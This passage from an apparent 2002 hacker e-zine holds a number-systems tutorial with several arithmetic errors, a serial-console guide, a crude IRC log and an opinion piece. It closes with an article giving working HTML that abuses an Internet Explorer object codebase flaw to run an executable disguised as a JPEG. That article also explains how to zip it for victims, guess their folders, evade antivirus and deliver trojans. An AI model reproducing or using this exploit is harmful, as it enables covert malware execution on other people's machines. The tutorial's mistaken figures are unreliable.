(my wife wanted to see it)... my sexuality is still fully in tact, and as a
bonus you get to see britney in her underwear on two seperate occasions,
one of which is within 30 seconds o f the opening credits... but my point
is that i still consider myself punk at heart.. if you don't think that's
hardcore, well fuck you... who's punker than who? does it really matter?
just keep it real.. practice what you preach.. if you want to talk about
not caring what others think, then fucking DO IT..
fwaggle
catch me on irc.mooircd.org / #moo
�������������������������������������������������������������ij
+-+-+-+-+-+-+-+-+
��������۲�������������|O|u|t|b|r|e|a|k|𰰰�����������������
+-+-+-+-+-+-+-+-+
Issue #4 - Page 7 of 12
�������������������������������������������������������������ij
Number Systems and Binary Math
Written by Meggito on September 1, 2001
Last updated on October 20, 2001
First off, giving credit where credit's due. I'd like to thank Sally =
Ballacqua, Mary Johnson, Hanet Mully, and Charles Brewer who's packet =
gave me a much better way to look at numbering systems and encouraged a =
rewrite of this file. This file starts off with what binary and =
hexadecimal are and how to convert to other number systems. Afterward I =
use binary math to show how to do math in ANY number system. I use =
binary for most math but the multiplication, division, and modulus are =
done the same way in other numbering systems. I cover how to and not to =
do addition, subtraction, multiplication, division, and modulation. =
Also, how to use floating point decimals and multiplication and division =
with them. I tried to make it as simple as I could so it is easily =
understandable.
Decimal
The most common number system, the decimal system is based on a system =
of ten. Each column can represent ten symbols and each additional =
column represents multiples of ten of the column to its right. Meaning =
that 9 is nine and 90 is nine multiples of ten. 95 is then nine =
multiples of ten followed by 5 multiples of 1. The multiples each column =
will represent will depend on the system. In the decimal system it =
goes:
0 5, 4 =
6 3. 4
^ ^ ^ =
^ ^ ^
10,000 1,000 100 =
10 1 .1
This number would be 5,463.4 when combined, five-thousand, four-hundred, =
sixty-three. A good way to look at this is combining each column. The =
'and' is used to represent the decimal point. The number farthest right =
without passing a decimal point (.) is always the ones place. If there =
is no decimal point then the one place is considered to be the farthest =
right. Each group of whole number group of 3 is seperated by a comma. =
If there are 0s on either end they may be eliminated except in certain =
situations (used to represent a certainty) that unless you're a =
scientist aren't important. Many of these rules will follow into other =
numbering systems.
Binary
Binary is also similar to Decimal. The largest difference is that it is =
based on either true or false, on or off, or 1 or 0. Each coumn can =
only represent one of two numbers. This means that each coumn has a =
value of 1 or 0.
1 0 1 1 1 =
0 1 1 0 1
^ ^ ^ ^ ^ =
^ ^ ^ ^ ^
256 128 64 32 16 =
8 4 2 1 .5
The above number 101110110.1 would be equivalent to 374.5 (decimal =
points or binary points or whatever are rare in binary but do exist). =
This is much different from what most people are used to, but if you =
wanted to convert it into your familiar decimal system you could =
multiply each number by its decimal equivalent. Either you add the =
number or you don't, 1 or 0. You can just take the truths and add them. =
So 256 + 64 + 32 + 16 + 4 + 2 + .5 =3D 374.5. This causes numbers to =
be much longer than in other number systems. This is the system used to =
program computers because of the fact that are either true or false. =
Programming languages are just representations of these 1s and 0s. Each =
of these columns is known as a bit. They are usually grouped into =
groups of eight, known as bytes. One byte can represent up to =
two-hundred fifty-six possibilities. Usually when you have a number =
that uses less than a whole byte, such as 1011 (thirteen) you'd add =
valuless 0s to then end to complete the byte, 00001011. This enables =
computers to know when one byte ends and another begins. So =
0110110101100101 is the same thing as 01101101 and 01100101 because a =
computer will seperate them into groups of eight. This allows an =
endless stream of 1s and 0s without any need for spacing, which a =
computer cannot recognize, except as another set of 1s and 0s that =
aren't seperated.
Another odd piece of binary is negatives. There is usually no negative =
sign, and never with programming. There are signed and unsigned binary =
numbers. If it is signed then the first number represents positive and =
negative. 0 is positive and 1 is negative. This also means that an =
unsigned 8 bit binary byte can have a value of from 0 to 255 while a =
signed binary byte can have a value from -128 to 127. Both do have 256 =
possible values though. I'll cover negatives under adding and adding =
negatives.
Hexadecimal System
This system is similar to the decimal system. The difference is that =
each column represents sixteen rather than ten. Appropriotly each =
column will also refer to sixteen multiples of the column to its right. =
Since the arabic writting system only has ten number characters the =
numbers eleven throguh sixteen are represented by the letters A thourgh =
F. Meaning that thirteen would be D and fifteen F. Remember, A is 10, =
not 11. I still make that mistake occasionally.
5 A 3 =
8 B 5
^ ^ ^ =
^ ^ ^=20
65536 4096 256 =
16 1 .0625
This would then be 5a38b.5. Meaning 5 x 65536, 11 x 4096, 3 x 256, etc. =
You can follow a similar approach to convert this as you did with =
binary. You would then find that this number is equivalent to =
369,547.0625 in the decimal system. Hexadecimal, or hex, is often used =
in programming. Since group is equivalent to 1000 in binary, =
hexadecimal is very useful to computer programming. One example of this =
is the very common use of hex code to represent colors. They use two =
columns to represent each of the three colors used in computers, red, =
green and blue. They are usually set up in the format RRGGBB where each =
letter represents the color relatively. Using the hex code any value =
between 0 and 256 (one byte) can be used to represent the amount of each =
color present. So you might find 5E425A used to represent a color. =
This would mean that there was 94 red, 66 green, and 90 blue out of a =
possible 256 each (a fairly grayish purple). This ability to converge =
on the same numbers as binary makes it very useful on computers.
Other Ways to Convert
One other method to look at ocnverting numbers is multiplying each digit =
by the base raised to the power of the digits location relative to the =
one's place. If yo don't allready know any number to the 1st power is =
itself and to the 0 power it is always 1. Note that all powers and =
roots are based on base 10.
Base 10 Base 7
342 =3D 3*(10^2) + 4*(10^1) + 2*(10^0) 4526 =3D 4*(7^3) + 5*(7^2) =
+ 2*(7^1) + 6*(7^0)
=3D 3*100 + 4*10 + 2*1 =3D =
4*343 + 5*49 + 2*7 + 6*1
=3D 300+40+2 =
=3D 1372+245+14+6
=3D 342 =
=3D 1637
To reverse this you divide by the base you want to change to and keep =
track of the remainders. Keep dividing until you get 0. The examples =
start from the bottom and work up! Read the awnser top down. You can =
do it the other way if you like but its a lot easier if you find youself =
having to do it on paper just to write the awnser above as you divide.
224 Base 10 to Base 2 519 Base 10 to Base 13
1/2 =3D 0 R 1
3/2 =3D 1 R 1
7/2 =3D 3 R 1
14/2 =3D 7 R 0
28/2 =3D 14 R 0
56/2 =3D 28 R 0 3/13 =3D 0 R3
112/2 =3D 56 R 0 39/13 =3D 3 R0
224/2 =3D 112 R 0 =3D11100000 519/13 =3D 39 RC =3D30C
Binary to Hexadecimal and Back
The fact that binary is base 2 and hexadecimal is base 2 to the 4th =
makes conversion simple. You just take each group of four binary digits =
and convert them one group at a time. The reverse is also true, look at =
the examples.
011001011110 can be split into groups of four...
0110-0101-1110 then you find the hexadecimal value for each group so...
6 5 E or 65E
so 011001011110 =3D 65E
A3F can be reverse by splitting each into its binary value so
A 3 F =3D
1010-0011-1111
This method can be used whenever the base of one system is divisible by =
another. It is based on logarithms that I'm not going into but its =
fairly simple math. If you had a base 3 and a base 9 then 3 base a bas =
9 digit would be 2 base 3 digits and 2 base 3 digits could convert to =
base 9.
Binary Addition and Adding Negative Numbers
Adding and subtracting unsigned binary numbers is fairly simple. You =
must remember to carry numbers over. Also when programming with a =
limited numbering of bits any numbers carried over will be lost. These =
examples are all 8 bit.
121 01111001
+183 10110111
304 100110000 but the leading 1 is lost so 00110000 or 48
In this example an two unsigned 8-bit numbers were added. There total =
was 304 but since any numbers carried past the number of bits allowed =
are lost. This means that after 255 the next number is 0. Subtracting =
is similar but slightly instead of subtracting you add the negative. To =
find the negative you take what is called the two's complement. First =
you find the complement of each bit (if you don't understand =
complements, change a 0 to a 1 and a 1 to a 0) to find the one's =
complement. Next you add 1 to that number to find the two's complement. =
This is the negative of the original number (also how you find =
negative's) and you just add that instead of subtracting.
58 42 =3D 00101010 so... =
58 00111010
-42 one's complement =3D 11010101 +(-42) 11010110
16 two's complement =3D 11010110 16 =
00010000
If the answer is negative or you just want to change a negative number =
to positive reverse this. First you subtract 1, (add 11111111), then =
finding the complement of each bit again.
11010110 11010101
+11111111 00101010 so...
11010101 42
It is important to remember that if the number is unsigned that there =
isn't a negative.
Multiplication and Long Division
Multiplication is fairly simple. If you had 3*7 you'd just do 7+7+7. =
This is how a computer does multiplication.
1221 (carry over) Simpler
3 00000011 so 00000111 00000111 /-> 00001110
- 7 00000111 00000111 00000111 / 00000111
21 00010101 00000111 00001110 --/ 00010101 =3D 21
00010101 =3D 21
The only problem here is that this doesn't work real well for larger =
numbers. No, well have to use long multiplication (well, they call it =
long division) because we aren't computers who can perform millions or =
additions a second.
13 00001101 1101
65 01000001 1101
00
+110100
1000001 =3D 65
Dividing is slightly different. Instead of adding you could multiple by =
the reciprical. This means instead of multiplying by 7 you multiply by =
1/7. Also, remember that any number /1 equals itself.
14 00001110 00001110 * 00000001 =3D 00001110 =3D 14
7 00000111 00000001 * 00000111 =3D 00000111 =3D 7
2 00000010
So, if you have any smarts about you you'll notice that the awnser is 14 =
over 7 which takes us back to where we started. Kinda useless isn't it. =
Just a good thing to know doesn't work. This is where long division =
comes in...
14 00001110 0010 or 0010 =3D 2
7 00000111 111/1110
2 00000010
This is kinda simple because I used easy numbers. When you get to =
0000111, 000001111 will go into it once (you can ignore the leading 0s). =
It gets much more complicated but it can be done. Since these are =
simple numbers it is unnecessary to turn them into negatives but you may =
have to in many cases.
15 00001111 0001.111 =3D 1+.5+.25+.125
8 00001000 1000/1111 1.875
1.875 00000001.111 -1000
01110
-1000
01100
-1000
01000
-1000
0000
Problem is that unless you're using a data type that recognizes decimals =
(int doesn't unless you put them deliberately put them in) the decimals =
will be lost. If these were both ints the answer would be 1. This is =
when modulus comes in. Most people have not run into modulus before =
programming. Modulus is basically the remainder when after being =
divided. The symbol for modulus is %. For example, 15%8 would be the =
remainder when dividing by 8, so the answer is 7. When doing this in =
binary just stop when you run out of numbers, no decimal point (or =
whatever), and take whatever's left. You may need to change these =
numbers to negatives if you do not understand the subtration.
17 00010001 00000101 =3D 7 (division)
%3 00000011 11/00010001
2 00000010 -11
0100
-11
010 =3D 2 (modulus)
Modulus comes at the same time as multiplication and division in the =
orders of operation. You read it from left to right and do whichever =
comes first of the 3.
In both multiplication and division of 2s or multiples of 2s all you =
have to do is shift numbers. Multiplication shifts left and division =
shifts right. For example, 0110*2=3D1100 and 0110/2=3D0011. Also, =
00110000*4=3D11000000 and 00110000/8=3D00000110. You shift it but the =
exponent 2 is to. Since 8 is 2^3 you move it 3 digits. The same is =
true of modulus, all you have to do is shift it right as you would in =
division and then take the value after the decimal. So 0101%2=3D010.1 =
or 1. 0111%8=3D.111 or 7.
Floating=20
A while ago the IEEE (Institute of Electrical Engineers) came up with a =
standard 32 bit representation for floating points. There are 3 parts =
to this, the sign is 1 bit, the exponent is 8, and the mantissa is 23.
01101100111010000000000000000000
| |______||___________________|
| | |
| Exponent Mantissa
Sign
The sign decides whether a number is positive or negative in the same =
way as a signed bit. The exponent is the power that the mantissa is to. =
The mantissa is the value to the exponent. To find a number's mantissa =
and exponent divide it by 2 until it is between 0 and 1. The mantissa =
is the remainder ignore the decimal point. The exponent is the number =
of times you had to divide added to 127. An easy way to find the =
exponent without converting to decimal is to just add a 1 in the first =
digit and subtract 1 from the number. So 7 is 10000110.
13/2 =3D 6.5/2 =3D 3.25/2 =3D 1.625/2 =3D 0.8125
So the mantissa is 0.8125 and the exponent is 131 (4+127)
Which in binary the mantissa is 0.1101 (notice that 1101 is 13) and the =
exponent is 10000011
This would be rewritten as 0-10000011-11010000000000000000000
So 13 =3D 00001101 =3D 010000011110100000000000000000000000
This can also be done starting with a binary number. There is a big =
advantage in that since you are dividing by 2 you can just shift it left =
until there is no 1 (value) after the decimal and the number of times =
you've shifted is the exponent. When using negatives carry the 1 over =
to the mantissa and do not worry about finding the two's compliment.
00000110
So the exponent is 10000010 because you've shifted 3
The mantissa is 110 (the number after the first 1) + twenty 0s to make =
it 23 digits
This means your final number is 01000001011000000000000000000000
So 00000110 =3D 01000001011000000000000000000000
Multiplication and Division, Floating Point Style
All you have to do with mantissas to multiply or divide is add or =
subtract the sign and exponents and multiply or divid the mantissas =
respectively. Obviously adding is multiplication and subtracting is =
division. Do not use the first digit in the exponent when adding, it =
will always be a 1. When using negative's it is not necessary and =
usually easier not to find the two's compliment.
Multiplication
11 =3D 00001011 =3D 0 10000011 10110000000000000000000
5 =3D 00000101 =3D 0 10000010 10100000000000000000000
55 =3D 00110111 =3D 0 10000101 11011100000000000000000 =
(1011*101=3D110111)
Division
30 =3D 00011110 =3D 0 10000100 11110000000000000000000
-6 =3D 00000110 =3D 1 10000010 11000000000000000000000
-5 =3D 00000101 =3D 1 10000010 10100000000000000000000 (1111/11=3D101)
I beleive I am mistaken slightly on this. I think there is something =
you're supposed to do with the leading 1 in the exponent but I do not =
know what. Also You may have to convert into two's compliment for =
negative numbers. I'd be surprised if the two weren't related. Either =
way just carrying the negative to the sign works fine.
ASCII and Symbols
ASCII, or American Standard Code for Information Interchange, was =
proposed by ANSI as a way to represent symbols (letters, numbers, etc.) =
with a byte. They developed a set of one-hundred twenty eight basic =
symbols that most computers represent. Each corresponds to a certain =
number as listed in a second. This set of 128 symbols is fairly =
standard though it varies some. Other symbols are available in the =
other possible 128 symbols, the extended set. One problem is that there =
are a variety of extended sets, many using different symbols and =
arrangements. There are also other standards such as Unicode(16 bit =
multi-writing-system, ie Traditional Chinese) and EBCDIC (Extended =
Binary Coded Decimal Interchange Code) that are much less common. For =
those of you who don't know this, hold alt and hit one of these key =
combinations. Pretty useless except for the extended set but good to =
know.
I'm leaving out the first 32 symbols and 127 because they are to be =
recognized by your computer. I can't think of any reason other than =
programming to ever know them, and if you're programming then you have =
them or can get them.
000 - - 00000000 064 - @ - 01000000
001 - - 00000001 065 - A - 01000001
002 - - 00000010 066 - B - 01000010
003 - - 00000011 067 - C - 01000011
004 - - 00000100 068 - D - 01000100
005 - - 00000101 069 - E - 01000101
006 - - 00000110 070 - F - 01000110
007 - - 00000111 071 - G - 01000111
008 - - 00001000 072 - H - 01001000
009 - - 00001001 073 - I - 01001001
010 - - 00001010 074 - J - 01001010
011 - - 00001011 075 - K - 01001011
012 - - 00001100 076 - L - 01001100
013 - - 00001101 077 - M - 01001101
014 - - 00001110 078 - N - 01001110
015 - - 00001111 079 - O - 01001111
016 - - 00010000 080 - P - 01010000
017 - - 00010001 081 - Q - 01010001
018 - - 00010010 082 - R - 01010010
019 - - 00010011 083 - S - 01010011
020 - - 00010100 084 - T - 01010100
021 - - 00010101 085 - U - 01010101
022 - - 00010110 086 - V - 01010110
023 - - 00010111 087 - W - 01010111
024 - - 00011000 088 - X - 01011000
025 - - 00011001 089 - Y - 01011001
026 - - 00011010 090 - Z - 01011010
027 - - 00011011 091 - [ - 01011011
028 - - 00011100 092 - \ - 01011100
029 - - 00011101 093 - ] - 01011101
030 - - 00011110 094 - ^ - 01011110
031 - - 00011111 095 - _ - 01011111
032 - (space) - 00100000 096 - ` - 01100000
033 - ! - 00100001 097 - a - 01100001
034 - " - 00100010 098 - b - 01100010
035 - # - 00100011 099 - c - 01100011
036 - $ - 00100100 100 - d - 01100100
037 - % - 00100101 101 - e - 01100101
038 - & - 00100110 102 - f - 01100110
039 - ' - 00100111 103 - g - 01100111
040 - ( - 00101000 104 - h - 01101000
041 - ) - 00101001 105 - i - 01101001
042 - * - 00101010 106 - j - 01101010
043 - + - 00101011 107 - k - 01101011
044 - , - 00101100 108 - l - 01101100
045 - - - 00101101 109 - m - 01101101
046 - . - 00101110 110 - n - 01101110
047 - / - 00101111 111 - o - 01101111
048 - 0 - 00110000 112 - p - 01110000
049 - 1 - 00110001 113 - q - 01110001
050 - 2 - 00110010 114 - r - 01110010
051 - 3 - 00110011 115 - s - 01110011
052 - 4 - 00110100 116 - t - 01110100
053 - 5 - 00110101 117 - u - 01110101
054 - 6 - 00110110 118 - v - 01110110
055 - 7 - 00110111 119 - w - 01110111
056 - 8 - 00111000 120 - x - 01111000
057 - 9 - 00111001 121 - y - 01111001
058 - : - 00111010 122 - z - 01111010
059 - ; - 00111011 123 - { - 01111011
060 - < - 00111100 124 - | - 01111100
061 - =3D - 00111101 125 - } - 01111101
062 - > - 00111110 126 - ~ - 01011110
063 - ? - 00111111 127 - - 01011111
�������������������������������������������������������������ij
+-+-+-+-+-+-+-+-+
��������۲�������������|O|u|t|b|r|e|a|k|𰰰�����������������
+-+-+-+-+-+-+-+-+
Issue #4 - Page 8 of 12
�������������������������������������������������������������ij
----nix console---
Ok boys, since I feel this is so leet I will share it with you.
Its pretty sweet to use small old 286/386/486 as a serial consol for a
linux box. The feel and look is preety sweet. most people shy away from
terminals since there is really no graphics. I use my consoles for alot of
different things my ultimate use is for stuff like pinging,dns resolving
and nmap. To get things started you must first have or purchase a null
modem cable this can be a 9 pin or 25 pin its real cool to make your own
cables but most people find it less time consuming to just outright by a
cable. The price of a cheep null modem cable is no more then 15 dollars.
Getting a terminal is very simple, only 4 steps are needed, the hardest
part is making sure that you have a proper null-modem cable for you needs.
First--we need to make shure that getty is installed on your box.
at the root issue the command:
whereis getty
If you can not find it you need to install it, on Redhat 6.0 and up even on
7.2, it is located on the 2nd CD /RedHat/RPMS/getty_ps-2.0.7j-12.i386.rpm.
For you non redhat users it is just just as simple to install the getty
package for you distro.
Secound--on your linux box we need to add a line in /etc/inittab.
S1:23456:respawn:/sbin/getty ttyS1 9600 vt100
What all this means:
S1:---------------is a line reminder.
23456:------------are the run levels.
respawn:----------is automatic restart on disconnect.
/sbin/getty:------is a command.
ttyS1-------------is the serial port command for windows Com2 (use ttys0
for COM1). 9600--------------is the buad rate ---I use 19200 for 486`s.
vt100-------------is the Terminal type (you can use one that suits your
needs,(vt320) works great
Third--you need to restart you linux box or type issue the >init q<
command which restarts your /inittab file commands.
Fourth--If everything worked out right all you need on the box your using
as a terminal is a terminal emulatoron a windows box like (procomm) or
(kermite) I like procomm is real close to linux`s (minicom), minicom is
actually a hack look and feal copy of procomm.
You dont really need a DOS box for the terminal. You can use a floppy linux
distro, also. their are many flavors of floppy distros that will work for
this. If you want to make it simple for your self use a msdos boot disk and
put ither the kermite or procomm application to start up in the
autoexec.bat. just make sure that in procomm and kermite you set it to use
the right comm port that you specified in your /etc/inittab file. important
to make sure you also plugged it into the right com port also.
Take note if you can get your hands on a old terminal, this is real cool I
think a old terminal looks alot leeter then a old 386/486. If you have a
terminal you can forget the msdos box or linux distro box with the
emulator.
To sum things up a you can have a cool terminal for your linux server.
Having a terminal as a console keeps your server simple, This also spares
you from wasting a nice monitor that is just going to sit thier and do
nothing.. If you happen to want to run X from your old 286/386/486 this can
be done whithout a null modem cable , you need a nic card instead. A x
terminal has many more steps involved, I will not get into X consoles
since their are many howto`s on the net. X console is almost as easy to set
up as a terminal console. A little know how and skills are needed also.
Enjoy `,)
`amatier
---------------------------------------------------------------------
I Have Seen The Future, And Have Seen The Past, And Yes Our Master Is
Thier.<<<`das`amatier>>> Free Your Mind. The Future Is Near...
---------------------------------------------------------------------
�������������������������������������������������������������ij
+-+-+-+-+-+-+-+-+
��������۲�������������|O|u|t|b|r|e|a|k|𰰰�����������������
+-+-+-+-+-+-+-+-+
Issue #4 - Page 9 of 12
�������������������������������������������������������������ij
join (#hacking) hackerinc (hackerinc@AC967D3E.ipt.aol.com)
<hackerinc> hello]
<@BadGadget> hax0rinc
<@BadGadget> word
<@BadGadget> so you're like a an incorporated hacker?
<hackerinc> ok
<hackerinc> just a name
<hackerinc> u
<@BadGadget> what's your real name?
<hackerinc> hacker27
<@BadGadget> wow. your mom must have been smoking the shit dude
<@BadGadget> that name sucks
<hackerinc> anyway
<hackerinc> what going on in here
<@BadGadget> so hacker27. if I can call you by your birth name
[ka] join (#hacking) c-k-y (~c-k-y@65.92.99.135)
<hackerinc> not
<@BadGadget> where do you live hacker27?
<hackerinc> ca
<hackerinc> u
<@BadGadget> detroit. wiggidy wiggidy
<hackerinc> ok
<@BadGadget> so hacker27. is there any meaning behind that name? like any origin. was your dad named hacker27?
<hackerinc> just a nanme
<@BadGadget> a nanme?
<@BadGadget> never heard of that
<@BadGadget> is that in germany?
<hackerinc> r u hacker
<@BadGadget> no. I'm BadGadget
<hackerinc> oh
<@BadGadget> you're hacker27
<@BadGadget> geez. you must be smoking the rock dude
<@BadGadget> did you think I was you or something?
<@BadGadget> hey hacker27. you there?
<@BadGadget> you taking a shit or something?
<hackerinc> i'm back
<@BadGadget> were you molesting yourself?
<hackerinc> i';m not u
<@BadGadget> well that's obvious
<@BadGadget> because if you were, you'd be here.
<hackerinc> ok
<@BadGadget> wiggidy wiggidy.
----------------------------------
contact BG: badgadget@molested.net
---------------------------------- �������������������������������������������������������������ij
+-+-+-+-+-+-+-+-+
��������۲�������������|O|u|t|b|r|e|a|k|𰰰�����������������
+-+-+-+-+-+-+-+-+
Issue #4 - Page 10 of 12
�������������������������������������������������������������ij
Prodigal|Son's short text on web browers for Linux
--------------------------------------------------
I wonder why there are no good web browsers for linux. mozilla is decent,
and so is opera. Netscape will be a little better when the new version comes
out, but I don't think there will be a good one for linux until internet
explorer comes out for it. Other *nix platforms have internet explorer, why
not linux? You may argue that the webpages are optimized for internet explorer,
so only certain features will only work in internet explorer. But don't you
agree that the neat little features that a web browser has makes it a good
web browser? I've tried to use WINE and run internet explorer but it doesn't
seem to work very well. Microsoft continues to make products for the mac os,
including internet explorer, but not for linux, and the last time I looked,
linux had a little bit bigger market share of the OS's then apple, so why
not make internet explorer compatable for linux? It seems to me that it
makes sense to make it available on the linux platform. So until a good web
browser like internet explorer comes out for linux, I'm staying with windows
to surf the web.
- Prodigal|Son <amlouden@insightbb.com>
�������������������������������������������������������������ij
+-+-+-+-+-+-+-+-+
��������۲�������������|O|u|t|b|r|e|a|k|𰰰�����������������
+-+-+-+-+-+-+-+-+
Issue #4 - Page 11 of 12
�������������������������������������������������������������ij
It Doesn't Do What It Says On The Tin!
======================================
#include "the usual disclaimers.h" /* (please e-mail the author for a copy of
the disclaimers) */
Someone kindly discovered a little loop hole that allows you to run .exe files
from within an HTML page. With all the latest patches at the time of writing
this article, Internet Explorer is now limited to only having this flaw when the
HTML file is opened from the local hard drive.
Here's a small example (note that the formatting here is specially done so that
Norton Antivirus doesn't delete this article like it was doing on one of my
previous ones). Copy and paste the following into an HTML page and open it in
Internet Explorer. It should start the Calculator if you're using Windows NT,
2000 or XP.
<html>
<object id = "o"
classid = "clsid:11111111-1111-1111-1111-111111111111"
codebase = "c:/winnt/system32/calc.exe"
height=0
width=0
</object>
</html>
The first issue we have with this is that we have to hard code the entire path
to the .exe file. So on Windows 95/98/Me the above would fail. But with a slight
modification we can make it work on all version of Windows. Like this...
<html>
<object id = "o1"
classid = "clsid:11111111-1111-1111-1111-111111111111"
codebase = "c:/winnt/system32/calc.exe"
height=0
width=0
</object>
<object id = "o2"
classid = "clsid:11111111-1111-1111-1111-111111111111"
codebase = "c:/windows/calc.exe"
height=0
width=0
</object>
</html>
What I've done is make it try both directories, and the correct one will run,
and the other won't.
The second issue is that this is pretty boring. You can't pass command line
parameters to the program you're trying to run using this technique. So anything
that you run will probably not do anything harmful, or will at least prompt the
user first. The most damage you could do is fill up memory and desktop space
with an annoying high amount of applications, and may cause the computer to
crash from the overload.
If you're trying to give someone a trojan (trojan debates are banned!), they
will spot your .exe file a mile away. So, the third issue you'll encounter is
trying to send someone your HTML file with an .exe file without them getting a
slight bit suspicious.
So, I played around a bit more and came up with a new trick that allowed me to
run the .exe file no matter what its file name was! Soon I will explain how.
Firstly, copy your calc.exe file to a file named example.jpg and put it into a
folder of its own, eg. C:\workbench. Create an HTML file in the same folder
called example.html which contains the following HTML code:
<html>
<object id = "o1"
classid = "clsid:11111111-1111-1111-1111-111111111111"
codebase = "c:/workbench/example.jpg"
height=0
width=0
</object>
</html>
Now, when you open the HTML file it currently FAILS to run the "example.jpg"
file (which is really calc.exe with a different name, remember?). So I
discovered that if you add a URL-type parameter "?.exe" to the file path then
the browser thinks we're dealing with an .exe (lazy coders), but when the URL
is actually parsed again for running the file, only the file name up to before
the question mark is used. The remaining characters are discarded as they are
assumed to be parameters as per correct URL formatting. The following will now
work:
<html>
<object id = "o1"
classid = "clsid:11111111-1111-1111-1111-111111111111"
codebase = "c:/workbench/example.jpg?.exe"
height=0
width=0
</object>
</html>
This little coding oversight allows us to name the file whatever we like. I
chose to use a JPEG file because you'd typically expect it to contain a whole
lot of binary data - similar to what an .exe file might look like to the
untrained eye - and that an HTML file will probably be accompanied by a JPEG or
two. Most users will go to open the HTML file first to get the full effect
before ever trying to open individual JPEGs. Besides, if they try to view the
JPEG they will just get invalid file format errors, so they may be none the
wiser about what it really is.
The fourth issue you'll encounter is how do you get someone to open the
HTML file locally? Simple. Zip up the two files. When they receive the zip file
they have to extract the contents to the local hard drive before viewing them.
The fifth issue you'll encounter now is guessing the directory they're going to
unzip the files to. This is because we have to specify a complete path to the
".exe" file.
So take what we did before and create objects that point to any kinds of folders
you think a user might use on various operating systems. Here are a few examples
to give you the idea:
<html>
<object id = "o1"
classid = "clsid:11111111-1111-1111-1111-111111111111"
codebase = "c:/mirc/downloads/example.jpg?.exe"
height=0
width=0
</object>
<object id = "o2"
classid = "clsid:11111111-1111-1111-1111-111111111111"
codebase = "c:/temp/example.jpg?.exe"
height=0
width=0
</object>
<object id = "o3"
classid = "clsid:11111111-1111-1111-1111-111111111111"
codebase =
"c:/Documents and Settings/Administrator/Local Settings/Temp/example.jpg?.exe"
height=0
width=0
</object>
<!-- you could on for ages trying many different folders -->
<!-- You might even try putting in some real HTML content in the page too
so the user is not suspicious at the outset -->
</html>
Note that we give the object a new name each time. We don't want any unexpected
errors to stop us of course.
Remember to keep the spacing around the equals signs ("=") because Norton
Antivirus will stop you dead in your tracks if you don't.
This was just a fun experiment. Don't use it to create havoc! That's naughty
and bad and wastes system administrators' time and companies' money. However,
you can use this against Osamu Bin Laden if you see him online.
Well, that's all from me for now. I look forward to the next time.
- Timeless
2002-04-18
PS. Greetz to all at #hackerzlair and #outbreakzine on DalNet, and to all my
friends (you already know who you are).
PPS. How to view an HTML file from now on... um, lol, DON'T! It doesn't really
leave you with a warm fuzzy feeling does it?
</article>
_______________________________________________________________
|______________________________________________________________ |
|| ||
|| ___ _ ____ _ ||
|| / _ \ _ _| |_| __ ) _ __ ___ __ _| | _ ||
|| | | | | | | | __| _ \| '__/ _ \/ _` | |/ / ||
|| | |_| | |_| | |_| |_) | | | __/ (_| | < ||
|| \___/ \__,_|\__|____/|_| \___|\__,_|_|\_\ ||
|| ||
||_____--------------------------------------------------______||
|_______/-----------------------------------------------\_______|
___ _ _
| __(_)_ _ __ _| |
| _|| | ' \/ _` | |
__ |_| |_|_||_\__,_|_|
\ \ / /__ _ _ __| |___
\ \/\/ / _ \ '_/ _` (_-<
\_/\_/\___/_| \__,_/__/
����������������������������������������������������������������
PUT THE WORDS IN HERE:
Well, thanks to everyone who submitted articles for #4. You all
rule. I encourage you all to send me some texts for the the next
issue of Outbreak. We have a domain now. So you can check us out
at http://www.outbreakzine.net
Send all your articles to me at: kleptic@outbreakzine.net
Enjoy!
- kleptic <kleptic@outbreakzine.net>
����������������������������������������������������������������
++++++++++++++++++++++++++WATCH THIS SPACE++++++++++++++++++++++
����������������������������������������������������������������ij
+-+-+-+-+-+-+-+-+
-���������������������۲������-|O|u|t|b|r|e|a|k|𰰰������������������۲�����-
+-+-+-+-+-+-+-+-+
����������������������������������������������������������������ij
OutBreak Contents may not be used with out express written permission
By the Editor - kleptic@outbreakzine.net
COPYRIGHT�� 2002.